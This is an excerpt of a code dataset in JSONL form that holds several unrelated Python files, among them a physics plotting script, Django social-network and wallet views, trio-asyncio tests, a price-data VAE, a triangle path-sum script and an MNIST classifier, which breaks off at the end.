bracket\n denominator = 4 * neutron_mass**2 * therm_time\n\n return numerator/denominator\n\n\ndef cross_section_bert(DM_mass):\n\n numerator = coupling_squared_bert(DM_mass) * neutron_mass**2 * DM_mass**2\n denominator = pi *(neutron_mass + DM_mass)**2\n cross_section_GeV2 = numerator/denominator\n\n return cross_section_GeV2 * (1/(1.97e7) *1e-9)**2 * 1e4\n\n\ndef make_plot_cross_section():\n mass_range = np.logspace(-6, 6, num = 1000)\n cross_section_array_bert = np.empty(0)\n\n for mass in mass_range:\n dummy_bert = cross_section_bert(mass)\n cross_section_array_bert = np.append(cross_section_array_bert, dummy_bert)\n\n fig, ax1 = plt.subplots(figsize = (20, 11), dpi = 500)\n ax1.loglog(mass_range, cross_section_array_bert, color='navy')\n ax1.axis([1e-6, 1e6, 1e-59, 1e-53])\n ax1.set(xlabel = r'$m_\\chi$ [GeV]', ylabel = r'$\\sigma$ [cm$^2$]')\n ax1.grid(linestyle='--')\n ax1.fill_between(mass_range, cross_section_array_bert, facecolor='cornflowerblue')\n ax1.text(1e-2, 4e-57, 'No thermalization', fontsize=40)\n\n plt.savefig('bert_cs.png')\n\n\nmake_plot_cross_section()\n","sub_path":"Bertoni Code/bertoni_analytic.py","file_name":"bertoni_analytic.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"471284877","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate\nfrom dashboard.forms import EditProfileForm\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.db.models import Q\nfrom account.models import Account\nfrom dashboard.models import Friend, Wallet, Transaction, feed, Message, Page\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import ListView, CreateView\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\n# from dashboard.models import Friends\n\ndef dashboard_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\n\tp = Page.objects.all()\n\tprint(p)\n\targs = {\n\t\t\"text\" : \"This is the dashboard\",\n\t\t'pages' : p\n\t}\n\n\taccounts = Account.objects.all()\n\targs['accounts'] = accounts \n\n\tif request.user.is_authenticated:\n\t\treturn render(request, 'dashboard.html', 
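The plotting loop in bertoni_analytic.py grows its result array one element at a time with np.append, which is quadratic in the number of masses. Both formulas are pure elementwise arithmetic, so they broadcast over the whole mass grid in one call; a sketch reusing the record's constants and expressions:

import numpy as np

pi = np.pi
Temp = 1e3 / 1.16e4 * 1e-9                      # neutron star temperature in GeV
neutron_mass = 0.939                            # GeV
therm_time = 1e10 * 3.154e7 / 6.58e-16 * 1e9    # GeV^-1

def cross_section_bert(DM_mass):
    # DM_mass may be a scalar or an ndarray; everything broadcasts.
    k_n = np.sqrt(4 * DM_mass * Temp)
    k_0 = DM_mass / 3
    coupling = (105 * pi**3 * DM_mass * (1 / k_n**4 - 1 / k_0**4)
                / (4 * neutron_mass**2 * therm_time))
    sigma = coupling * neutron_mass**2 * DM_mass**2 / (pi * (neutron_mass + DM_mass)**2)
    return sigma * (1 / 1.97e7 * 1e-9)**2 * 1e4  # GeV^-2 -> cm^2

mass_range = np.logspace(-6, 6, num=1000)
cross_sections = cross_section_bert(mass_range)  # one call, no np.append loop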
args)\n\telse : return redirect('login')\n\ndef profile_view(request, u_id=None):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_data = Account.objects.filter(id=u_id)[0]\n\n\tposts = feed.objects.filter(post_to = user_data).order_by('-date_posted')\n\n\tis_friend = False\n\n\tif int(u_id) == int(request.user.id):\n\t\tis_friend = True\n\n\tif Friend.objects.filter(user_1 = user_data, user_2 = request.user).exists() | Friend.objects.filter(user_2 = user_data, user_1 = request.user).exists():\n\t\tis_friend = True\n\tprint(is_friend)\n\n\targs = {\n\t\t'user': user_data,\n\t\t'u_id' : int(u_id),\n\t\t'posts' : posts,\n\t\t'is_friend' : is_friend\n\t}\n\treturn render(request, 'profile.html', args)\n\ndef edit_profile_info_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {}\n\n\tif request.method == \"POST\":\n\t\tform = EditProfileForm(request.POST, instance=request.user)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/profile/'+str(request.user.id)+'/')\n\t\n\telse:\n\t\tform = EditProfileForm(instance=request.user)\n\t\targs = {'edit_profile_info_form': form}\n\t\treturn render(request, 'edit_profile_info.html', args)\n\ndef change_password_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {}\n\n\tif request.method == \"POST\":\n\t\tform = PasswordChangeForm(data=request.POST, user=request.user)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tupdate_session_auth_hash(request, form.user)\n\t\t\treturn redirect('/profile/'+str(request.user.id)+'/')\n\t\telse: return redirect('change_password')\n\telse: \n\t\tform = PasswordChangeForm(user=request.user)\n\t\targs = {'change_password_form': form}\n\t\treturn render(request, 'change_password.html', args)\n\n\ndef search_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\t\n\tsearch_content = request.GET.get('q')\n\t# print(request.user.id)\n\n\n\tif search_content:\n\t\tresults = Account.objects.filter(\n\t\t\tQ(username__icontains=search_content)\n\t\t\t| Q (email__icontains=search_content)\n\t\t\t| Q (first_name=search_content)\n\t\t\t)\n\t\tresults = results.exclude(id=request.user.id)\n\n\n\t\tif results:\n\t\t\targs = {\n\t\t\t\t'result' : results,\n\t\t\t\t'status' : 200,\n\t\t\t\t'error' : '' \n\t\t\t}\n\t\t\treturn render(request, 'search.html', args)\n\t\telse:\n\t\t\targs = {\n\t\t\t\t'result' : '',\n\t\t\t\t'status' : 0,\n\t\t\t\t'error' : {\n\t\t\t\t\t1 : 'No results found'\n\t\t\t\t}\n\n\t\t\t}\n\t\t\treturn render(request, 'search.html', args)\n\treturn render(request, 'search.html')\n\n\ndef friends_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = request.user\n\tfriends = (Friend.objects.filter(user_1 = user_1) | Friend.objects.filter(user_2 = user_1) ) & Friend.objects.filter(status = True)\n\n\targs = {\n\t\t'friends' : friends,\n\t\t'status' : 200,\n\t\t'errors' : ''\n\t}\n\n\treturn render(request, 'friends.html', args)\n\ndef friend_requests_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = request.user\n\tfriend_requests = Friend.objects.filter(user_2 = user_1) & Friend.objects.filter(status = False)\n\n\targs = {\n\n\t\t'friend_requests' : friend_requests,\n\t\t'status' : 200,\n\t\t'errors' : ''\n\t}\n\n\treturn render(request, 'friend_request.html', args)\n\ndef send_request_view(request, u_id):\n\tif not 
request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {\n\n\t}\n\tuser_1 = request.user\n\tuser_2 = Account.objects.filter(id=u_id)[0]\n\n\tif Friend.objects.filter(user_1 = user_1, user_2 = user_2).exists() | Friend.objects.filter(user_1 = user_2, user_2 = user_1).exists():\n\t\treturn redirect('friends')\n\telse : \n\t\tfriend_request = Friend(user_1 = user_1, user_2 = user_2, status = False)\n\t\tfriend_request.save()\n\n\treturn redirect('friends')\n\t\ndef accept_request_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_2 = request.user\n\tuser_1 = Account.objects.filter(id=u_id)[0]\n\n\taccept_request = Friend.objects.get(user_1 = user_1, user_2 = user_2, status = False)\n\taccept_request.status = True\n\taccept_request.save()\t\n\treturn redirect('friends')\n\ndef delete_request_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = Account.objects.filter(id=u_id)[0]\n\tuser_2 = request.user\n\n\tif Friend.objects.filter(user_1 = user_1, user_2 = user_2).exists():\n\t\tFriend.objects.filter(user_1 = user_1, user_2 = user_2).delete()\n\n\tif Friend.objects.filter(user_1 = user_2, user_2 = user_1).exists():\n\t\tFriend.objects.filter(user_1 = user_2, user_2 = user_1).delete()\n\t# delete_request.save()\n\n\treturn redirect('friend_requests')\n\ndef unfriend_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tuser_1 = request.user\n\tuser_2 = Account.objects.filter(id=u_id)[0]\n\tprint(user_1)\n\tprint(user_2)\n\tprint(\"inside here ----------\")\n\t# remove_friend_2 = Friend.objects.filter(user_1 = user_2, user_2 = user_1)[0] | Friend.objects.filter(user_1 = user_1, user_2 = user_2)[0] \n\n\tif Friend.objects.filter(user_1 = user_2, user_2 = user_1).exists():\n\t\tFriend.objects.filter(user_1 = user_2, user_2 = user_1)[0].delete()\n\t\n\n\tif Friend.objects.filter(user_1 = user_1, user_2 = user_2).exists():\n\t\tFriend.objects.filter(user_1 = user_1, user_2 = user_2)[0].delete()\n\n\n\treturn redirect('friends')\n\n\ndef wallet_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\t# print(Wallet.objects.filter(user = request.user))\n\tbalance = Wallet.objects.filter(user = request.user)[0].balance\n\ttransactions = Transaction.objects.filter(user_1 = request.user, status = True) | Transaction.objects.filter(user_2 = request.user, status = True)\n\n\ttransactions_count = len(transactions)\n\targs = {\n\t\t'balance' : balance,\n\t\t'transactions' : transactions,\n\t\t'transactions_count' : transactions_count\n\n\t}\n\treturn render(request, 'wallet.html', args)\n\n\ndef transactions_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransactions = Transaction.objects.filter(user_1 = request.user, status = True) | Transaction.objects.filter(user_2 = request.user, status = True)\n\n\ttransactions_count = len(transactions)\n\targs = {\n\t\t# 'balance' : balance,\n\t\t'transactions' : transactions,\n\t\t'transactions_count' : transactions_count\n\t}\n\treturn render(request, 'transactions.html', args)\n\ndef add_money_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {\n\t\n\t}\n\n\tif request.method == \"POST\":\n\t\tamount = request.POST.get('amount')\n\t\t\n\t\tif(amount==''):\n\t\t\treturn redirect('wallet')\n\t\tif(len(amount)>7):\n\t\t\treturn redirect('/wallet/add_money/')\n\t\tif int(amount) > 0 
:\n\t\t\twallet_instance = Wallet.objects.filter(user = request.user)[0]\n\t\t\tif(len(str(int(wallet_instance.balance)+int(amount)))>12):\n\t\t\t\treturn redirect( 'wallet' )\n\t\t\twallet_instance.balance = str(int(wallet_instance.balance) + int(amount))\n\t\t\twallet_instance.save()\n\n\t\t\treturn redirect('wallet')\n\n\treturn render(request, 'add_money.html', args)\n\n\t\ndef transfer_money_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\n\tfriends = (Friend.objects.filter(user_1 = request.user) | Friend.objects.filter(user_2 = request.user) ) & Friend.objects.filter(status = True)\n\n\tif request.method == \"POST\":\n\t\treceiver_id = request.POST.get('u_id')\n\t\tamount = request.POST.get('amount')\n\t\tif(amount==''):\n\t\t\treturn redirect('wallet')\n\t\tif(len(amount)>7):\n\t\t\treturn redirect('/wallet/transfer_money/')\n\t\tif(int(amount)<0):\n\t\t\treturn redirect('/wallet/transfer_money/')\n\t\taccount_balance = Wallet.objects.filter(user = request.user)[0]\n\n\t\ttransactions = Transaction.objects.filter(user_1 = request.user, status = True) | Transaction.objects.filter(user_2 = request.user, status = True)\n\n\t\ttransactions_count = len(transactions)\n\n\t\tif request.user.is_casual_user and not request.user.is_premium_user and not request.user.is_commercial_user and transactions_count>15:\n\t\t\treturn redirect('wallet')\n\n\t\tif request.user.is_premium_user and not request.user.is_commercial_user and transactions_count>30:\n\t\t\treturn redirect('wallet')\n\n\n\t\tif int(account_balance.balance) - int(amount) >= 0 : \n\n\t\t\taccount_balance.balance = int(account_balance.balance) - int(amount)\n\t\t\taccount_balance.save()\n\n\t\t\tuser_2 = Account.objects.filter(id = receiver_id)[0]\n\t\t\tt = Transaction(user_1 = request.user, user_2 = user_2, status = False, payment_method = 'paytm', amount = amount)\n\t\t\t\n\t\t\tt.save()\n\t\n\t\treturn redirect('wallet')\n\n\n\targs = {\n\t\t'friends' : friends\n\t}\n\treturn render(request, 'transfer_money.html', args)\n\ndef accept_decline_transaction_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransaction_requests = Transaction.objects.filter(user_2 = request.user, status = False)\n\n\ttransaction_requests_count = len(transaction_requests)\n\n\targs = {\n\t\t# 'balance' : balance,\n\t\t'transactions' : transaction_requests,\n\t\t'transactions_count' : transaction_requests_count\n\t}\n\n\treturn render(request, 'accept_decline.html', args)\n\ndef accept_transaction_view(request, t_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransaction = Transaction.objects.filter(id = t_id)[0]\n\tprint(transaction.user_1)\n\tuser_wallet = Wallet.objects.filter(user = request.user)[0]\n\tprint(user_wallet)\n\tsender_wallet = Wallet.objects.filter(user = transaction.user_1)[0]\n\tprint(sender_wallet.balance)\n\ttransaction_amount = transaction.amount\n\n\tuser_wallet.balance = user_wallet.balance + transaction_amount\n\t\n\tuser_wallet.save()\n\n\ttransaction.status = True\n\ttransaction.save()\n\n\treturn redirect('accept_decline')\n\ndef decline_transaction_view(request, t_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\ttransaction = Transaction.objects.filter(id = t_id)[0]\n\tsender_wallet = Wallet.objects.filter(user = transaction.user_1)[0]\n\tsender_wallet.balance = int(sender_wallet.balance) + int(transaction.amount)\n\tsender_wallet.save()\n\ttransaction.delete()\n\n\treturn 
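The wallet views above follow a read-modify-write pattern (fetch the balance, add in Python, save), which loses updates under concurrent requests and is made more fragile by the balance being stored as a string. A sketch of the standard Django fix, assuming a Wallet whose balance is a numeric field; that schema change is my assumption, not something the record does:

from django.db import transaction
from django.db.models import F
from dashboard.models import Wallet

def credit_wallet(user, amount):
    # The arithmetic runs inside the database, so two concurrent credits
    # both land instead of one overwriting the other.
    with transaction.atomic():
        Wallet.objects.filter(user=user).update(balance=F('balance') + amount)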
redirect('accept_decline')\n\n\n\ndef create_group_view(request):\n\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\targs = {\n\t\n\t}\t\n\treturn render(request, 'messenger.html', args)\n\ndef create_post_view(request, u_id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\t\n\targs = {\n\t\t'u_id' : u_id\n\t}\n\n\tif request.method == \"POST\":\n\t\tcontent = request.POST.get('post_content')\n\t\tpost_to = Account.objects.filter(id = u_id)[0]\n\t\tauthor = request.user\n\t\tprint(content)\n\t\tprint(post_to)\n\t\tprint(author)\n\t\tf = feed(content = content, post_to = post_to, author = author)\n\t\tf.save()\n\n\t\treturn redirect('/profile/'+str(u_id))\n\n\n\treturn render(request, 'create_post.html', args)\n\ndef upgrade_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tif request.user.is_commercial_user:\n\t\tuser_type = 2\n\telif request.user.is_premium_user:\n\t\tuser_type = 1\n\telse: user_type = 0\n\n\n\targs = {\n\t\t'user_type' : user_type,\n\t}\n\n\treturn render(request, 'upgrade.html', args)\n\n\ndef upgrade_payment_view(request, type):\n\n\targs = {\n\t\t'type' : int(type)\n\t}\n\n\t# if int(type) == 1:\n\t\t# args['payment']['2_groups'] = 50\n\t\t# args['payment']['4_groups'] = 100\n\t\t# args['payment']['any_groups'] = 150\n\t\t \n\tif int(type) == 2:\n\t\tif request.user.is_verified:\n\t\t\targs['payment_amount'] = 5000 \n\n\n\tif request.method == \"POST\":\n\t\tprint(\"inside\")\n\n\t\taccount = Account.objects.filter(id = request.user.id)[0]\n\t\tif(request.POST.get('amount')):\n\t\t\tamount = request.POST.get('amount')\n\t\t\twallet = Wallet.objects.filter(user = request.user)[0]\n\t\t\tif(wallet.balance - int(amount) >=0):\n\t\t\t\twallet.balance = int(wallet.balance) - int(amount)\n\t\t\t\twallet.save()\n\t\t\t\n\t\t\t\taccount.is_premium_user = True\n\t\t\t\tif int(amount) == 50:\n\t\t\t\t\taccount.premium_type = 1\n\t\t\t\tif int(amount) == 100:\n\t\t\t\t\taccount.premium_type = 2\n\t\t\t\tif int(amount) == 150:\n\t\t\t\t\taccount.premium_type = 3\n\t\t\t\taccount.save()\n\n\t\t\treturn redirect('dashboard')\n\t\t\n\t\tprint(\"very inside\")\n\t\tamount = 5000\n\t\twallet = Wallet.objects.filter(user = request.user)[0]\n\t\tprint(wallet.balance)\n\t\tif(wallet.balance - int(amount) >=0):\n\t\t\twallet.balance = int(wallet.balance) - amount\n\t\t\tprint(wallet.balance)\t\n\t\t\twallet.save()\n\t\t\taccount.is_commercial_user = True\n\t\t\taccount.save()\n\t\treturn redirect('dashboard')\n\n\treturn render(request, 'upgrade_payment.html', args)\n\n# adarsh\n\ndef messenger_view(request):\n\tif not request.user.is_authenticated:\n \t\treturn redirect('login')\n\tuser_1 = request.user\n\tfriends = (Friend.objects.filter(user_1 = user_1) | Friend.objects.filter(user_2 = user_1) ) & Friend.objects.filter(status = True)\n\n\targs = {\n\t\t'friends' : friends,\n\t\t'status' : 200,\n\t\t'errors' : ''\n\t}\n\n\t# args = {\n\t\n\t# }\t\n\treturn render(request, 'messenger.html', args)\n\n\n\t\t\ndef messenge_view(request,user_1,user_2):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\tval=False\n\tmes=[]\n\tis_friend=False\n\n\tu_1 = Account.objects.filter(id = int(user_1))\n\tu_2 = Account.objects.filter(id = int(user_2))\n\n\tif u_1.count() == 0 or u_2.count() == 0:\n\t\treturn redirect('home')\n\n\tu_1 = u_1[0]\n\tu_2 = u_2[0]\n\n\tif u_1 == None or u_2 == None:\n\t\treturn redirect('home')\n\n\tif (Friend.objects.filter(user_1 = u_1, user_2=u_2)).exists() 
| (Friend.objects.filter(user_1 = u_2, user_2=u_1)).exists():\n \t\tis_friend=True\n\tif(not is_friend):\n\t\treturn redirect('home')\t\t\n\taccounts = Account.objects.all()\n\n\tif u_1 == request.user:\n\t\tval = u_1.is_commercial_user | u_1.is_premium_user\n\n\tif u_2 == request.user:\n\t\tval = u_2.is_commercial_user | u_2.is_premium_user\n\tprint(val)\n\n\tvalue =Message.objects.all().order_by('message_sent')\n\tfor i in range(len(value)):\n\t\tif((int(value[i].user_1.id)==int(user_1) and int(value[i].user_2.id)==int(user_2) and is_friend) or (int(value[i].user_2.id)==int(user_1) and int(value[i].user_1.id)==int(user_2) and is_friend)):\n\t\t\tmes.append(value[i])\n\t\t\t\n \t\t\t\t\t\n\targs1={\n\t\t'visibile' :val,\n\t\t'message' : mes,\n\t}\n\n\tif(request.method == 'POST'):\n\t\tmm = request.POST.get('post_area')\n\n\t\tif mm == '':\n\t\t\treturn redirect('/messenger/'+user_1+'/'+user_2+'/')\n\n\t\tu11 = Account.objects.filter(id = int(user_1))[0]\n\t\tu21 = Account.objects.filter(id = int(user_2))[0]\n\t\ttme = timezone.now()\n\t\tvar = Message(user_1 = u11,user_2 = u21,message = mm,message_sent=tme)\n\t\tprint(var.message_sent)\n\t\tvar.save()\n\t\treturn redirect('/messenger/'+user_1+'/'+user_2+'/')\n\treturn render(request, 'chatapp.html', args1)\n\ndef create_page_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tif not request.user.is_commercial_user:\n\t\treturn redirect('dashboard')\n\n\n\targs = {\n\n\t}\n\n\tif request.method == \"POST\":\n\t\tpage_title = request.POST.get('page_name')\n\t\tcontent = request.POST.get('content')\n\n\t\tp = Page(page_title = page_title, content = content, user = request.user)\n\t\tp.save()\n\n\t\tprint(page_title)\n\t\tprint(content)\n\n\n\n\treturn render(request, 'create_page.html', args)\n\ndef page_view(request, id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tif(Page.objects.filter(id = int(id)).count() == 0):\n\t\treturn redirect('dashboard')\n\n\tp_data = Page.objects.filter(id = int(id))[0]\n\n\tprint(p_data.page_title)\n\n\targs = {\n\t\t'page_data' : p_data\n\t}\n\n\treturn render(request, 'page.html', args)\n","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"575188618","text":"import pytest\nimport sys\nimport asyncio\nfrom async_generator import async_generator, yield_\n\ntry:\n import trio_asyncio\nexcept ImportError:\n pytestmark = pytest.mark.skip(reason=\"trio-asyncio not available\")\n\n\nasync def use_asyncio():\n await trio_asyncio.aio_as_trio(asyncio.sleep)(0)\n\n\n@pytest.fixture()\n@async_generator\nasync def asyncio_loop():\n async with trio_asyncio.open_loop() as loop:\n await yield_(loop)\n\n\n@pytest.fixture()\n@async_generator\nasync def asyncio_fixture_with_fixtured_loop(asyncio_loop):\n await use_asyncio()\n await yield_()\n\n\n@pytest.fixture()\n@async_generator\nasync def asyncio_fixture_own_loop():\n async with trio_asyncio.open_loop():\n await use_asyncio()\n await yield_()\n\n\n@pytest.mark.trio\nasync def test_no_fixture():\n async with trio_asyncio.open_loop():\n await use_asyncio()\n\n\n@pytest.mark.trio\nasync def test_half_fixtured_asyncpg_conn(asyncio_fixture_own_loop):\n await use_asyncio()\n\n\n@pytest.mark.trio\nasync def test_fixtured_asyncpg_conn(asyncio_fixture_with_fixtured_loop):\n await 
use_asyncio()\n","sub_path":"pytest_trio/_tests/test_trio_asyncio.py","file_name":"test_trio_asyncio.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"233285615","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nimport trader_vae\n\ntraining_data_path = r\"C:\\Users\\Fifth\\Trader\\Trader\\TrainingDataMini1Vol.npz\"\ndata = np.load(training_data_path)\ntraining_data = data['x_train']\nfuture_price = data['y_train']\ndata.close()\n\n# data processing\nnSamples = training_data.shape[0]\nnTimesteps = training_data.shape[1]\nnFeatures = training_data.shape[2]\n\nTVAE = trader_vae.Trader_VAE(nTimesteps,nFeatures)\n\nprice_histories = training_data[:,:,0]\nvolume_histories = training_data[:,:,1]\n\nprice_scaler = MinMaxScaler(feature_range=(-1, 1))\nvolume_scaler = MinMaxScaler(feature_range=(-1, 1))\n\nprice_scaler.fit(future_price)\nvolume_scaler.fit(volume_histories)\n\nprice_histories_scaled = np.reshape(price_scaler.transform(price_histories),(nSamples,nTimesteps,1))\nvolume_histories_scaled = np.reshape(volume_scaler.transform(volume_histories),(nSamples,nTimesteps,1))\ntraining_data_scaled = np.concatenate((price_histories_scaled,volume_histories_scaled),axis=2)\n\nfuture_price_scaled = price_scaler.transform(future_price)\n\nxs = training_data_scaled[:,:,0]\nxs = np.reshape(xs,(nSamples,nTimesteps))\n\nTVAE.train(xs)\n\nplt.figure(figsize = (15, 5))\nfor idx in range(0,nSamples):\n price_history_scaled = training_data_scaled[idx,:,0]\n test_data = np.reshape(price_history_scaled, (1, nTimesteps,))\n plt.plot(price_history_scaled,label='truth')\n latent_var = TVAE.encoder.predict(test_data)\n decoded_data = TVAE.decoder.predict(latent_var)\n decoded_prices_scaled = np.reshape(decoded_data[:],(nTimesteps,1))\n plt.plot(decoded_prices_scaled,label=\"decoded\")\n plt.ylim(0,1)\n plt.show()\n plt.legend()\n plt.pause(0.1)\n plt.clf()","sub_path":"Dream_playground.py","file_name":"Dream_playground.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"513624778","text":"import random\nimport csv\nimport time\nimport os\n\n# Read the input value from the command line and store it in n.\n# For large n such as 1000 or 2000 this took longer than expected, so the elapsed time is measured out of curiosity.\n# n=1000 - 1.859 s, n=3000 - 14.752 s \nn=int(input(\"Enter the size (rows) of the triangle : \"))\ncal_start = time.time()\n\n# Build a random triangle with n rows from the input and save it to triangle.csv.\nwith open('triangle.csv', 'w', newline='') as fw:\n wr = csv.writer(fw,delimiter=',')\n for i in range(1,n+1):\n a=[]\n j = 1\n while j <= i:\n a.append(random.randint(0,99))\n j=j+1\n wr.writerow(a)\nfw.close\n\n# Read triangle.csv back in; each row is one list, so the array a becomes a 2-D array.\nwith open('triangle.csv', 'r') as fo:\n reader_csv = csv.reader(fo)\n i=0\n for row in reader_csv:\n a[i]=row\n i=i+1\n if n <= 30:\n print(row)\ni=n\n\n# After loading the triangle, walk up from the bottom row to compute the path sum.\n# Since this is a recurrence, generalizing over i yields the algorithm.\n# Adding the larger of row i's j-th and (j+1)-th values to row i-1's j-th entry lets us drop row i and consider only rows up to i-1.\n# Repeating this up to the top row leaves the maximum path sum at the very top.\nwhile i >= 2:\n #print(a[i-1])\n for j in range(0,i-1):\n a[i-2][j]=int(a[i-2][j])+max(int(a[i-1][j]),int(a[i-1][j+1]))\n #print(a[i-2][j])\n i=i-1\n \nelapsed = int(1000*(time.time() - cal_start))\n\n# The top element a[0][0] is the maximum path sum.\nprint('Calculate time : %d ms\\nMaximum path sum : 
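The bottom-up recurrence the triangle script implements (add the larger of the two children to each parent, row by row) fits in a small pure function, with a worked example:

def max_path_sum(triangle):
    # Fold each row into the one above, keeping the larger branch.
    rows = [list(map(int, row)) for row in triangle]
    for i in range(len(rows) - 1, 0, -1):
        for j in range(len(rows[i]) - 1):
            rows[i - 1][j] += max(rows[i][j], rows[i][j + 1])
    return rows[0][0]

print(max_path_sum([[3], [7, 4], [2, 4, 6], [8, 5, 9, 3]]))   # 3+7+4+9 = 23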
%d'%(elapsed,a[0][0]))\nos.system('Pause')\n","sub_path":"10th_act/0718/homework/Algorithm/no1.py","file_name":"no1.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"343932355","text":"#James Roth\n#5/17/18\n#warmup17.py - words with all chars of my last name\n\nfile = open(\"engmix.txt\")\n\nname = input(\"Enter your last name: \")\n\nnameChar = []\n\nfor char in name:\n if char not in nameChar:\n nameChar.append(char.lower())\n\nfor item in file:\n num = 0\n for i in range(0,len(nameChar)):\n if nameChar[i] in item:\n num+=1\n if num == len(nameChar):\n print(item)","sub_path":"warmup17.py","file_name":"warmup17.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"499745271","text":"## Imports\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nlayers = tf.keras.layers\n\nnum_epochs = 20\n\ndata_filename = \"DataConv{}.cvs\"\ndata_stride = 1\n\ntf.random.set_seed (123456)\n\n## Load data\nchar_set = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = char_set.load_data ()\n\nshape_t = x_train.shape\nx_train = x_train.reshape (shape_t[0],shape_t[1],shape_t[2],1)\nshape_v = x_test.shape\nx_test = x_test.reshape (shape_v[0],shape_v[1],shape_v[2],1)\n\nprint (\"Reshaped\")\n\nsample_size = x_train.shape[0]\nsample_shape = x_train[0].shape\n\n## Normalize\nx_train = x_train/255.0\nx_test = x_test /255.0\n\n## Create model\nmodel = tf.keras.models.Sequential ()\nmodel.add (layers.Conv2D (4, (7,7), activation='relu', input_shape=sample_shape))\n#model.add (layers.Dropout (0.2))\nmodel.add (layers.Conv2D (6, (7,7), activation='relu'))\n#model.add (layers.Dropout (0.2))\nmodel.add (layers.Conv2D (10, (7,7), activation='relu'))\n#model.add (layers.Dropout (0.2))\nmodel.add (layers.Flatten ())\nmodel.add (layers.Dense (10, activation=\"softmax\"))\nmodel.summary ()\n\nmodel.compile (optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=[])\n\n## Train\nresult = model.fit (x_train, y_train,\n epochs=num_epochs,\n batch_size=600,#6000,\n verbose=1,\n validation_data=(x_test, y_test))\n\n\n\nprint (\"initial loss:\", result.history['loss'][0])\nprint (\"initial vali:\", result.history['val_loss'][0])\nprint (\"final loss: \", result.history['loss'][-1])\nprint (\"final vali: \", result.history['val_loss'][-1])\npred_train = np.argmax (model.predict (x_train), axis=1)\npred_test = np.argmax (model.predict (x_test), axis=1)\ndiff_train = pred_train - y_train\ndiff_test = pred_test - y_test\nerrs_train = np.sum (np.absolute (diff_train))\nerrs_test = np.sum (np.absolute (diff_test))\nprint (\"training size: \", x_train.shape[0])\nprint (\"training errors: \", errs_train)\nprint (\"training %err: \", 100*errs_train/x_train.shape[0])\nprint (\"validation size: \", x_test.shape[0])\nprint (\"validation errors:\", errs_test)\nprint (\"validation %err: \", 100*errs_test/x_test.shape[0])\n\n## Plot\nepoch = range (num_epochs)\nif data_filename:\n for att in [[\"loss\",\"Loss\"],[\"val_loss\",\"Vali\"]]:\n with open (data_filename.format (att[1]), \"w\") as f:\n prop = result.history[att[0]]\n for i in range (0, len (prop), data_stride):\n f.write (\"{0:d},{1:f}\\n\".format (i, prop[i]))\nplt.plot (epoch, result.history['loss'], label='loss')\nplt.plot (epoch, result.history['val_loss'], 
